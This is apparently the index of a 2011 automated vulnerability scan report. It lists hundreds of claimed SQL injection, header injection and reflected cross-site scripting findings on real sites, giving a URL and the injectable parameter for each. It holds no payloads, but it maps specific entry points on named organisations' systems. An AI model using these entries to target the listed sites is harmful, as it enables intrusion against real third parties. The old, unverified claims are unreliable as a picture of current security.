XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10050211-05

Report generated by XSS.CX at Wed Oct 05 16:43:28 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. http://ad.doubleclick.net/adj/interactive.wsj.com/blog_deals [id cookie]

1.2. http://ad.doubleclick.net/adj/interactive.wsj.com/blog_venturecapital [name of an arbitrarily supplied request parameter]

1.3. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s37146793666761 [REST URL parameter 2]

1.4. http://theplatform.com/ [Referer HTTP header]

1.5. http://theplatform.com/ [ReleaseDeliveryTime cookie]

1.6. http://theplatform.com/ [ReleasePID cookie]

1.7. http://theplatform.com/ [__utma cookie]

1.8. http://theplatform.com/ [__utmb cookie]

1.9. http://theplatform.com/ [__utmz cookie]

1.10. http://theplatform.com/ [exp_last_activity cookie]

1.11. http://theplatform.com/ [exp_last_visit cookie]

1.12. http://theplatform.com/ [exp_tracker cookie]

1.13. http://theplatform.com/ [keywords parameter]

1.14. http://theplatform.com/ [site_id parameter]

1.15. http://theplatform.com/ [where parameter]

1.16. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.17. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.18. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.19. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.20. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.21. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.22. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.23. http://unionsquareventures.disqus.com/thread.js [sessionid cookie]

1.24. http://www.mongodb.org/dosearchsite.action [queryString parameter]

1.25. http://www.mongodb.org/images/border/border_bottom.gif [REST URL parameter 1]

1.26. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css [REST URL parameter 7]

1.27. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:dialog/com.atlassian.auiplugin:dialog.css [REST URL parameter 8]

1.28. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css [REST URL parameter 7]

1.29. http://www.mongodb.org/s/1627/3/1.0.2/_/download/batch/com.atlassian.auiplugin:drop-down/com.atlassian.auiplugin:drop-down.css [REST URL parameter 8]

1.30. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 5]

1.31. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 7]

1.32. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.macros.profile:profile-macro-styles/confluence.macros.profile:profile-macro-styles.css [REST URL parameter 8]

1.33. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css [REST URL parameter 7]

1.34. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:comments/confluence.web.resources:comments.css [REST URL parameter 8]

1.35. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css [REST URL parameter 7]

1.36. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:contentnamesearch/confluence.web.resources:contentnamesearch.css [REST URL parameter 8]

1.37. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css [REST URL parameter 7]

1.38. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:master-styles/confluence.web.resources:master-styles.css [REST URL parameter 8]

1.39. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 7]

1.40. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:print-styles/confluence.web.resources:print-styles.css [REST URL parameter 8]

1.41. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css [REST URL parameter 7]

1.42. http://www.mongodb.org/s/1627/3/1.0/_/download/batch/confluence.web.resources:userlink/confluence.web.resources:userlink.css [REST URL parameter 8]

1.43. http://www.mongodb.org/s/1627/3/136/_/styles/colors.css [spaceKey parameter]

1.44. http://www.mongodb.org/s/1627/3/136/_/styles/combined.css [spaceKey parameter]

1.45. http://www.mongodb.org/s/1627/3/136/_/styles/custom.css [spaceKey parameter]

1.46. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [name of an arbitrarily supplied request parameter]

1.47. http://www.mongodb.org/s/1627/3/3/_/styles/colors.css [spaceKey parameter]

1.48. http://www.mongodb.org/s/1627/3/3/_/styles/custom.css [spaceKey parameter]

1.49. http://www.mongodb.org/s/1627/3/4/_/styles/combined.css [spaceKey parameter]

1.50. http://www.mongodb.org/s/1627/3/5/_/styles/combined.css [spaceKey parameter]

1.51. http://www.mongodb.org/s/1627/3/6/_/styles/combined.css [spaceKey parameter]

1.52. http://www.mongodb.org/s/1627/3/6/_/styles/custom.css [spaceKey parameter]

1.53. http://www.skillshare.com/data/0/0/1/12/nyc [REST URL parameter 3]

2. HTTP header injection

2.1. http://dw.com.com/clear/c.gif [REST URL parameter 2]

2.2. http://iv.doubleclick.net/pfadx/nbcu.lim.ny/131129433_undefined_weather_ [dcmt parameter]

2.3. https://signon.telstra.com/login [noFormURL parameter]

3. Cross-site scripting (reflected)

3.1. http://ad.adlegend.com/jscript [@CPSC@ parameter]

3.2. http://ad.adlegend.com/jscript [name of an arbitrarily supplied request parameter]

3.3. http://ad.adlegend.com/jscript [target parameter]

3.4. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

3.5. http://ad.burstdirectads.com/st [name of an arbitrarily supplied request parameter]

3.6. http://ads.pointroll.com/PortalServe/ [dom parameter]

3.7. http://ads.pointroll.com/PortalServe/ [flash parameter]

3.8. http://ads.pointroll.com/PortalServe/ [redir parameter]

3.9. http://ads.pointroll.com/PortalServe/ [time parameter]

3.10. http://api.bizographics.com/v1/profile.json [&callback parameter]

3.11. http://api.bizographics.com/v1/profile.json [api_key parameter]

3.12. http://api.bizographics.com/v1/profile.redirect [api_key parameter]

3.13. http://api.bizographics.com/v1/profile.redirect [callback_url parameter]

3.14. http://api.v2.badgeville.com/api/widgets/4e261f7efffffa1312583821/thenextweb.com.json [callback parameter]

3.15. http://api.v2.badgeville.com/api/widgets/4e261f7efffffa1312583821/thenextweb.com/players/leaderboard.json [callback parameter]

3.16. http://ar.voicefive.com/b/rc.pli [func parameter]

3.17. http://as.chango.com/links/adunit/1.31784957539e+12 [adpos parameter]

3.18. http://as.chango.com/links/adunit/1.31784957539e+12 [atype parameter]

3.19. http://as.chango.com/links/adunit/1.31784957539e+12 [bidder parameter]

3.20. http://as.chango.com/links/adunit/1.31784957539e+12 [datc parameter]

3.21. http://as.chango.com/links/adunit/1.31784957539e+12 [dc parameter]

3.22. http://as.chango.com/links/adunit/1.31784957539e+12 [dom parameter]

3.23. http://as.chango.com/links/adunit/1.31784957539e+12 [eid parameter]

3.24. http://as.chango.com/links/adunit/1.31784957539e+12 [ht parameter]

3.25. http://as.chango.com/links/adunit/1.31784957539e+12 [ibs parameter]

3.26. http://as.chango.com/links/adunit/1.31784957539e+12 [poo parameter]

3.27. http://as.chango.com/links/adunit/1.31784957539e+12 [sid parameter]

3.28. http://as.chango.com/links/adunit/1.31784957539e+12 [sig parameter]

3.29. http://as.chango.com/links/adunit/1.31784957539e+12 [st parameter]

3.30. http://as.chango.com/links/adunit/1.31784957539e+12 [stid parameter]

3.31. http://as.chango.com/links/adunit/1.31784957539e+12 [url parameter]

3.32. http://as.chango.com/links/adunit/1.31784957539e+12 [wh parameter]

3.33. http://as.chango.com/links/adunit/1.31784959608e+12 [adpos parameter]

3.34. http://as.chango.com/links/adunit/1.31784959608e+12 [atype parameter]

3.35. http://as.chango.com/links/adunit/1.31784959608e+12 [bidder parameter]

3.36. http://as.chango.com/links/adunit/1.31784959608e+12 [datc parameter]

3.37. http://as.chango.com/links/adunit/1.31784959608e+12 [dc parameter]

3.38. http://as.chango.com/links/adunit/1.31784959608e+12 [dom parameter]

3.39. http://as.chango.com/links/adunit/1.31784959608e+12 [eid parameter]

3.40. http://as.chango.com/links/adunit/1.31784959608e+12 [ht parameter]

3.41. http://as.chango.com/links/adunit/1.31784959608e+12 [ibs parameter]

3.42. http://as.chango.com/links/adunit/1.31784959608e+12 [poo parameter]

3.43. http://as.chango.com/links/adunit/1.31784959608e+12 [sid parameter]

3.44. http://as.chango.com/links/adunit/1.31784959608e+12 [sig parameter]

3.45. http://as.chango.com/links/adunit/1.31784959608e+12 [st parameter]

3.46. http://as.chango.com/links/adunit/1.31784959608e+12 [stid parameter]

3.47. http://as.chango.com/links/adunit/1.31784959608e+12 [url parameter]

3.48. http://as.chango.com/links/adunit/1.31784959608e+12 [wh parameter]

3.49. http://b.scorecardresearch.com/beacon.js [c1 parameter]

3.50. http://b.scorecardresearch.com/beacon.js [c10 parameter]

3.51. http://b.scorecardresearch.com/beacon.js [c15 parameter]

3.52. http://b.scorecardresearch.com/beacon.js [c2 parameter]

3.53. http://b.scorecardresearch.com/beacon.js [c3 parameter]

3.54. http://b.scorecardresearch.com/beacon.js [c4 parameter]

3.55. http://b.scorecardresearch.com/beacon.js [c5 parameter]

3.56. http://b.scorecardresearch.com/beacon.js [c6 parameter]

3.57. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/bootstrap/1872433 [max_followers parameter]

3.58. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [callback parameter]

3.59. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [site_id parameter]

3.60. http://bootstrap.thenextweb.fyre.co/api/v1.1/public/init.js [url parameter]

3.61. http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]

3.62. http://cc.wsj.net/cdssvco/file/v2/Files [absolutePath parameter]

3.63. http://cc.wsj.net/cdssvco/file/v2/Files [c parameter]

3.64. http://cdn.krxd.net/config/ [site parameter]

3.65. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 1]

3.66. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 2]

3.67. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 3]

3.68. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 4]

3.69. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 5]

3.70. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/fonts/proximanova-regular-webfont.woff [REST URL parameter 6]

3.71. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 1]

3.72. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 2]

3.73. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 3]

3.74. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 4]

3.75. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 5]

3.76. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/spreadus_button.png [REST URL parameter 6]

3.77. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 1]

3.78. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 2]

3.79. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 3]

3.80. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 4]

3.81. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 5]

3.82. http://cdn.thenextweb.com/wp-content/themes/tnw_6/static/images/sprite.png [REST URL parameter 6]

3.83. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 1]

3.84. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 2]

3.85. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 3]

3.86. http://cdn.thenextweb.com/wp-content/themes/tnw_6/style.css [REST URL parameter 4]

3.87. http://clientcentre.dstglobalsolutions.com/ [name of an arbitrarily supplied request parameter]

3.88. http://clientcentre.dstglobalsolutions.com/ [name of an arbitrarily supplied request parameter]

3.89. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [OpenForm parameter]

3.90. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [OpenForm parameter]

3.91. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [REST URL parameter 2]

3.92. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [REST URL parameter 2]

3.93. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [name of an arbitrarily supplied request parameter]

3.94. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [name of an arbitrarily supplied request parameter]

3.95. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [OpenForm parameter]

3.96. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [OpenForm parameter]

3.97. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [REST URL parameter 2]

3.98. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [REST URL parameter 2]

3.99. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [name of an arbitrarily supplied request parameter]

3.100. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [name of an arbitrarily supplied request parameter]

3.101. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [OpenForm parameter]

3.102. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [OpenForm parameter]

3.103. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [REST URL parameter 2]

3.104. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [REST URL parameter 2]

3.105. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [name of an arbitrarily supplied request parameter]

3.106. http://clientcentre.dstglobalsolutions.com/Registration.nsf/ie [name of an arbitrarily supplied request parameter]

3.107. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [OpenIcon parameter]

3.108. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [OpenIcon parameter]

3.109. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 1]

3.110. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 1]

3.111. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 3]

3.112. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/$icon [REST URL parameter 3]

3.113. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 1]

3.114. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 1]

3.115. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 3]

3.116. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 3]

3.117. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 4]

3.118. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/_format/screen_05112010.css [REST URL parameter 4]

3.119. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 1]

3.120. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 1]

3.121. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 3]

3.122. http://clientcentre.dstglobalsolutions.com/web/framework.nsf/scripts_05112010.js [REST URL parameter 3]

3.123. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [REST URL parameter 1]

3.124. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [REST URL parameter 1]

3.125. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [name of an arbitrarily supplied request parameter]

3.126. http://clientcentre.dstglobalsolutions.com/web/home.nsf/ [name of an arbitrarily supplied request parameter]

3.127. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 1]

3.128. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 1]

3.129. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 3]

3.130. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 3]

3.131. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 4]

3.132. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [REST URL parameter 4]

3.133. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [name of an arbitrarily supplied request parameter]

3.134. http://clientcentre.dstglobalsolutions.com/web/home.nsf/articlesByTitle/Registration%20FAQ [name of an arbitrarily supplied request parameter]

3.135. http://content.usv.com/decor/javascript/magnify_pipeline.js [REST URL parameter 1]

3.136. http://content.usv.com/decor/javascript/magnify_stats.js [REST URL parameter 1]

3.137. http://content.usv.com/decor/javascript/magnify_twitter_feed.js [REST URL parameter 1]

3.138. http://content.usv.com/decor/track/dot.gif [REST URL parameter 1]

3.139. http://content.usv.com/pages/10gen [REST URL parameter 1]

3.140. http://content.usv.com/pages/10gen [REST URL parameter 1]

3.141. http://content.usv.com/pages/albert-wenger [REST URL parameter 1]

3.142. http://content.usv.com/pages/albert-wenger [REST URL parameter 1]

3.143. http://content.usv.com/pages/brad-burnham [REST URL parameter 1]

3.144. http://content.usv.com/pages/brad-burnham [REST URL parameter 1]

3.145. http://content.usv.com/pages/bug-labs [REST URL parameter 1]

3.146. http://content.usv.com/pages/bug-labs [REST URL parameter 1]

3.147. http://content.usv.com/pages/canvas [REST URL parameter 1]

3.148. http://content.usv.com/pages/canvas [REST URL parameter 1]

3.149. http://content.usv.com/pages/covestor [REST URL parameter 1]

3.150. http://content.usv.com/pages/covestor [REST URL parameter 1]

3.151. http://content.usv.com/pages/gary-chou [REST URL parameter 1]

3.152. http://content.usv.com/pages/gary-chou [REST URL parameter 1]

3.153. http://content.usv.com/pages/hashable [REST URL parameter 1]

3.154. http://content.usv.com/pages/hashable [REST URL parameter 1]

3.155. http://content.usv.com/pages/john-buttrick [REST URL parameter 1]

3.156. http://content.usv.com/pages/john-buttrick [REST URL parameter 1]

3.157. http://content.usv.com/pages/skillshare [REST URL parameter 1]

3.158. http://content.usv.com/pages/skillshare [REST URL parameter 1]

3.159. http://content.usv.com/pages/soundcloud [REST URL parameter 1]

3.160. http://content.usv.com/pages/soundcloud [REST URL parameter 1]

3.161. http://crowdsupport.telstra.com/t5/forums/forumpage.twitterstreamtaplet:getnewtweets [renderedScripts parameter]

3.162. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 1]

3.163. http://fonts.wsj.com/k/qox0wee-e.css [REST URL parameter 2]

3.164. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpck parameter]

3.165. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpck parameter]

3.166. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpvc parameter]

3.167. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV1_Green_300x250.js [mpvc parameter]

3.168. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpck parameter]

3.169. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpck parameter]

3.170. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpvc parameter]

3.171. http://img.mediaplex.com/content/0/13754/86576/FINS_jobLogosV2_Blue_300x250.js [mpvc parameter]

3.172. http://installer.mpx.theplatform.com/installers/mpxUploader.air [REST URL parameter 2]

3.173. http://iv.doubleclick.net/pfadx/nbcu.lim.ny/131129433_undefined_weather_ [REST URL parameter 3]

3.174. http://js.revsci.net/gateway/gw.js [csid parameter]

3.175. http://link.theplatform.com/favicon.ico [REST URL parameter 1]

3.176. http://link.theplatform.com/s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b [REST URL parameter 1]

3.177. http://link.theplatform.com/s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b [format parameter]

3.178. http://link.theplatform.com/s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b [height parameter]

3.179. http://link.theplatform.com/s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b [width parameter]

3.180. http://link.theplatform.com/s/Xw6mu/CN1piYAIVAGNeopyg2Bq_XJHj3TmBn2b/tracker.log [REST URL parameter 1]

3.181. http://mads.cbs.com/mac-ad [ADREQ&SP parameter]

3.182. http://mads.cbs.com/mac-ad [ADREQ&beacon parameter]

3.183. http://mads.cbs.com/mac-ad [BRAND parameter]

3.184. http://mads.cbs.com/mac-ad [BRAND parameter]

3.185. http://mads.cbs.com/mac-ad [BRAND parameter]

3.186. http://mads.cbs.com/mac-ad [BRAND parameter]

3.187. http://mads.cbs.com/mac-ad [CELT parameter]

3.188. http://mads.cbs.com/mac-ad [COOKIE%3AANON_ID parameter]

3.189. http://mads.cbs.com/mac-ad [COOKIE%3AANON_ID parameter]

3.190. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

3.191. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

3.192. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

3.193. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

3.194. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

3.195. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

3.196. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.197. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.198. http://mads.cbs.com/mac-ad [IREFER_HOST parameter]

3.199. http://mads.cbs.com/mac-ad [IREFER_HOST parameter]

3.200. http://mads.cbs.com/mac-ad [META&ADSEPARATOR parameter]

3.201. http://mads.cbs.com/mac-ad [NCAT parameter]

3.202. http://mads.cbs.com/mac-ad [NCAT parameter]

3.203. http://mads.cbs.com/mac-ad [NODE parameter]

3.204. http://mads.cbs.com/mac-ad [NODE parameter]

3.205. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

3.206. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

3.207. http://mads.cbs.com/mac-ad [POS parameter]

3.208. http://mads.cbs.com/mac-ad [PTYPE parameter]

3.209. http://mads.cbs.com/mac-ad [PTYPE parameter]

3.210. http://mads.cbs.com/mac-ad [SITE parameter]

3.211. http://mads.cbs.com/mac-ad [cookiesOn parameter]

3.212. http://mads.cbs.com/mac-ad [cookiesOn parameter]

3.213. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

3.214. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

3.215. http://mads.cbs.com/mac-ad [x-cb parameter]

3.216. http://mads.cbs.com/mac-ad [x-cb parameter]

3.217. http://mads.cbsnews.com/mac-ad [ADREQ&SP parameter]

3.218. http://mads.cbsnews.com/mac-ad [ADREQ&beacon parameter]

3.219. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.220. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.221. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.222. http://mads.cbsnews.com/mac-ad [BRAND parameter]

3.223. http://mads.cbsnews.com/mac-ad [CELT parameter]

3.224. http://mads.cbsnews.com/mac-ad [CNET-PAGE-GUID parameter]

3.225. http://mads.cbsnews.com/mac-ad [CNET-PAGE-GUID parameter]

3.226. http://mads.cbsnews.com/mac-ad [DVAR_CID parameter]

3.227. http://mads.cbsnews.com/mac-ad [DVAR_CID parameter]

3.228. http://mads.cbsnews.com/mac-ad [DVAR_EXCLUDE parameter]

3.229. http://mads.cbsnews.com/mac-ad [DVAR_EXCLUDE parameter]

3.230. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

3.231. http://mads.cbsnews.com/mac-ad [DVAR_INSTLANG parameter]

3.232. http://mads.cbsnews.com/mac-ad [DVAR_SESSION parameter]

3.233. http://mads.cbsnews.com/mac-ad [DVAR_SESSION parameter]

3.234. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.235. http://mads.cbsnews.com/mac-ad [GLOBAL&CLIENT:ID parameter]

3.236. http://mads.cbsnews.com/mac-ad [IREFER_HOST parameter]

3.237. http://mads.cbsnews.com/mac-ad [IREFER_HOST parameter]

3.238. http://mads.cbsnews.com/mac-ad [NCAT parameter]

3.239. http://mads.cbsnews.com/mac-ad [NCAT parameter]

3.240. http://mads.cbsnews.com/mac-ad [NODE parameter]

3.241. http://mads.cbsnews.com/mac-ad [NODE parameter]

3.242. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

3.243. http://mads.cbsnews.com/mac-ad [PAGESTATE parameter]

3.244. http://mads.cbsnews.com/mac-ad [POS parameter]

3.245. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

3.246. http://mads.cbsnews.com/mac-ad [PTYPE parameter]

3.247. http://mads.cbsnews.com/mac-ad [SITE parameter]

3.248. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

3.249. http://mads.cbsnews.com/mac-ad [cookiesOn parameter]

3.250. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

3.251. http://mads.cbsnews.com/mac-ad [name of an arbitrarily supplied request parameter]

3.252. http://mads.cbsnews.com/mac-ad [x-cb parameter]

3.253. http://mads.cbsnews.com/mac-ad [x-cb parameter]

3.254. http://mads.cnet.com/mac-ad [&adfile parameter]

3.255. http://mads.cnet.com/mac-ad [BRAND parameter]

3.256. http://mads.cnet.com/mac-ad [BRAND parameter]

3.257. http://mads.cnet.com/mac-ad [CELT parameter]

3.258. http://mads.cnet.com/mac-ad [SITE parameter]

3.259. http://mads.cnet.com/mac-ad [SITE parameter]

3.260. http://mads.cnet.com/mac-ad [_RGROUP parameter]

3.261. https://manage.theplatform.com/remoteLogin.gsp [targetel parameter]

3.262. http://newyork.cbslocal.us.intellitxt.com/al.asp [jscallback parameter]

3.263. http://newyork.cbslocal.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

3.264. http://newyork.cbslocal.us.intellitxt.com/v4/init [jscallback parameter]

3.265. http://newyork.cbslocal.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

3.266. http://offers.cbslocal.com/widget/city/New-York/deals_blue/javascript/local-deals-0 [REST URL parameter 6]

3.267. http://pixel.adsafeprotected.com/jspix [anId parameter]

3.268. http://pixel.adsafeprotected.com/jspix [campId parameter]

3.269. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

3.270. http://pixel.adsafeprotected.com/jspix [pubId parameter]

3.271. https://portal.scanscout.com/ssframework/userSessionController.htm [login parameter]

3.272. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 2]

3.273. http://premium.mookie1.com/2/nbc.com/ac@Bottom3 [REST URL parameter 3]

3.274. http://proto16.tt.omtrdc.net/m2/proto16/mbox/standard [mbox parameter]

3.275. http://r.skimresources.com/api/ [callback parameter]

3.276. http://release.theplatform.com/content.select [REST URL parameter 1]

3.277. http://release.theplatform.com/content.select [REST URL parameter 1]

3.278. http://release.theplatform.com/content.select [REST URL parameter 1]

3.279. http://release.theplatform.com/content.select [REST URL parameter 1]

3.280. http://release.theplatform.com/crossdomain.xml [REST URL parameter 1]

3.281. http://release.theplatform.com/favicon.ico [REST URL parameter 1]

3.282. http://release.theplatform.com/favicon.ico [REST URL parameter 1]

3.283. http://s15.sitemeter.com/js/counter.asp [site parameter]

3.284. http://s15.sitemeter.com/js/counter.js [site parameter]

3.285. http://s20.sitemeter.com/js/counter.asp [site parameter]

3.286. http://s20.sitemeter.com/js/counter.js [site parameter]

3.287. http://s23.sitemeter.com/js/counter.asp [site parameter]

3.288. http://s23.sitemeter.com/js/counter.js [site parameter]

3.289. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

3.290. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

3.291. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

3.292. http://sl5.cdn.fwix.com/tools/geotagger/infowindow.php [api_key parameter]

